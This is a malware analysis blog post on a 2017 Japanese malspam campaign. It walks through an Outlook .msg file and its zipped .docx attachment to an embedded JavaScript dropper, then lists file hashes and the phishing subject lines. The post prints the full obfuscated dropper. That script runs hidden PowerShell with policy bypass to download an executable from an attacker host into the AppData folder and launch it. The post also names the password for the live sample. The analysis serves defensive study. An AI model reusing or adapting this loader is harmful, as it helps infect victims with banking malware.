[ Technical Teardown: Analysing MalSpam Attack – 標的型攻撃メール ]

Malware Analysis
1

Yesterday afternoon, there is an alert about MalSpam attack happening in Japan.
https://www.cc.uec.ac.jp/blogs/news/2017/04/20170425malwaremail.html

Malware authors have been sending malware via zipped attachments in spam emails for a long long time but many people are still puzzled at why/how it works. I will try to fill in the required information about where to look out for information and how decode some of the information.

Firstly, we are going to learn how are a bit about the .msg file format and how is it used to store a message object in a .msg file, which then can be shared between clients or message stores that use the file system.

In order to analyze the .msg file without Outlook, we can read more about the file format from:

The purpose of this post is to give a better technical understanding of how attackers makes use spam emails to spread malware.

[ Sample used in the analysis ]
MD5: 3370c5c8d0f42a33a652de0cc2f923ed
SHA256: 8613d560b4ab064bb6380fd999b65ef1a436b1f16161ef8789137691e8844587
Sample:

[ Part 1 : Getting Started ]
For those who want to follow along, this is a linkg to the .msg file 8613d560b4ab064bb6380fd999b65ef1a436b1f16161ef8789137691e8844587

Do note, this is a MALICIOUS file, so please do the analysis in a “safe” environment. The password to the attachment is “infected29A

Now, let’s start getting our hands dirty…and open the suspicious .msg file using Profiler.

 

Each “__substg” contains valuable pieces of information. The first four of the eight digits at the end tells you what kind of information it is (Property). The last four digits tells you the type (binary, ascii, Unicode, etc)

  • 0x007d: Message header
  • 0x0C1A: Sender name
  • 0x0C1F: Sender email
  • 0x0E1D: Subject (normalized)
  • 0x1000: Message body

Since this is a forwarded email (SOC-Mail00135 【注意:標的型攻撃メール?】FW 固定床炉処理日報),  we can see that it’s most probably a spoof email from a Japanese Institution.

From: <redacted> [mailto:[email protected]] 
Sent: Tuesday, April 25, 2017 5:57 PM

 

[ Part 2 : Email attachment ]
Since we can’t do proper email investigation, let’s look at the attachments.  Let’s look at “Root Entry/__attach_version1.0_#00000000” and refer to the specifications again.

  • //Attachments (37xx):
  • 0x3701: Attachment data
  • 0x3703: Attach extension
  • 0x3704: Attach filename
  • 0x3707: Attach long filenm
  • 0x370E: Attach mime tag

If we were to look at “__substg1.0_3704001F”, we will see that the filename of the attachment is called “M58A33~1.zip” and the display name “__substg1.0_3001001F” of the attachment is called “M58A33530641949.zip”.

 

Now let’s look at the actual data located within “__substg1.0_37010102” as shown below.

We can see that the zip file contained a .docx file, “vhlwspyw.docx

Now, let’s press “Ctrl+A” to select the entire contents. Then copy it into a new file as shown in the image below

 

We can now analyse the .docx but let’s use Profiler instead since it can already parse this entire Outlook file and identify what is inside the attachment.

As we can see from the image below, the docx contained an embedded OLE object which is actually a Javascript file.

The extracted Javascript looks like this.

var iAuQkGfebRzOopE = new ActiveXObject("wsCRipt.shELl");

function qeugztpaOGvCBSch(BMIzENpceOrlfaV, PuzGVDkaoxURNpM)

{

return BMIzENpceOrlfaV.split(PuzGVDkaoxURNpM).join("");

}

var AOdUSuYncvzHXwIbal = qeugztpaOGvCBSch(“H” +

“A%BKA%BLM\SA%BoA%BFA%BTA%BWAA%BrE\mA%BicRoA%BsoA%BfT\WA%BiA%BNdA%” +

“B” +

“oA%BWS\cA%BuA%BrA%BRA%BeNtvA%BEA%BRA%BsIA%BON\pA%BrA%BoA%BgraA%BmFA%BIlesDA%Bir”, “A%B”);

var WpmDxhzvaiJeOndB = new ActiveXObject(“sHEll.appLiCatIOn”);

var bTKNMHyQhYqRezkSUfw = (new Function(qeugztpaOGvCBSch(‘AZOdUSuZYZnZcZvZzHXwZIbZaZlZ =Z iZAZ’ +

‘uZQZkGZfZeZbRZzZOoZpZE’ +

‘.ZRZeZgZR’ +

‘eZadZ(AZOZd’ +

‘ZUSZuZYZncZvzZHZ’ +

‘XwZIZbaZlZ);’, “Z”)))();

var nKgesGQREcmoyLBtMkI = (‘FWFpmDFxhFz’ +

‘vaFiJFeFOnFdFBF.’ +

‘FShFelFlFEFxeFcFuFtFeF(F"cFmdF.eFxeF’ +

‘", "/cF FpiFnFg FlocaFlhoFsFtF F& poFwFeFrFsFhFeFlFlF.FeFxFeF -FexFecFutFiFonpolFicy byFpaFsF’ +

‘s F-FnFopFrFofFiFlFeF -FwFindoFwsFtFyFlFeF hiF’ +

‘dFdeFnF’ +

’ F(FnFeFwF-FobFjeFct FsFysFtFeF’ +

‘m.FnetF.FwFebFcFliFeFntF).downlFoadFf’ +

‘iFlFe(‘FhFtFtp://cFa.tFrFa’ +

‘deFlaFtFinosF.Fco/jF’ +

‘s’ +

‘F90F.F’ +

‘b’ +

‘inF?’ +

‘FLFIOv’,’%apFpDATa’ +

'%FMOFW1F2.eFxe’F)F; sFtFaFRtF-prFoFCesFS ‘F%FaFpFpD’ +

‘atFaF%FMOFWF1F2.eXE’F",F F"F"F,F "oFpFenF"F’ +

‘,F 0F);’);

nKgesGQREcmoyLBtMkI = qeugztpaOGvCBSch(nKgesGQREcmoyLBtMkI, RegExp(AOdUSuYncvzHXwIbal.charAt(8327 / 757)));

var dhbPqtWguwlcOKVB = (new Function(nKgesGQREcmoyLBtMkI))();

var wsh = new ActiveXObject(“wscript.shell”);

wsh.Popup(“Sorry, cant open document”);

After deobfuscation, its using PowerShell to download the payload from http://ca[.]tradelatinos[.]co/js90.bin?LIOv

However the payload is unavailable when i tried to grab it, but i’ve found these other js90.bin for same campaign.

Hashes of Malicious .DOCX

4e213f6c9e82dc74312f75221bc03afcf2d379a06df27a915e19f677c812e7ae
0b6ef9aea3368bc2677d8ca18f52fbaf195dcf1abd027d44f5e429eb303954d2
147816269769e5d8a047b22c1bbc7b1a137980936dc4d52fc3d3ac1e34275d15
d5a42d7a18ab57657a2be0489557ae770fd6bf83868135416fc5d9f17a387c66
3ede325154e9f63be6972060a0dbb7c61bcc18f6e4895b5048b66e5f4067334f

Hashes of Malware

29e6e888756aeb862703f075037006c42c6bc958aab5fd4814741882cdf44a52
1a29a6fec3a0d32158dcec14fcb4d4900d763c766f0acfddf1223e012f897035
fe0bea3616022c745669124d215d69141ca45f3e55b0ceae7f3c00ae7243369f
c22d2a4fe8d38b258ed6c4aee616b64bd88a0a21e4298ef06df1557f63c6654b
34426ed1985a798b4d5c1eef44599f59371dc940e72fb74b1ce3daf190de5b10
8aa66af668318ce1103883f86e5f772d6de6670020f767067187aed0dede834b
9460a705fbbf3805b369b92bff2345c2a763c01738d1bc69d6b25d868ba0869e

These are all Ursnif or Dreambot and there are articles and reversing tutorials on them.  So i shall leave it as an exercise for the readers.

  • http://www.seculert.com/blogs/ursnif-deep-technical-dive
  • https://www.youtube.com/watch?v=raoL6_0A5aw

Some of the subject titles of the emails are:

「付け出し」,「 発送の御連絡」,「のご注文ありがとうございます」,「固定床炉処理日報 」 , 「給料振込の件」

Thanks & Regards
Jacob Soo

Article Link: http://www.vxsecurity.sg/2017/04/26/technical-teardown-analysing-malspam-attack-標的型攻撃メール/

1 Like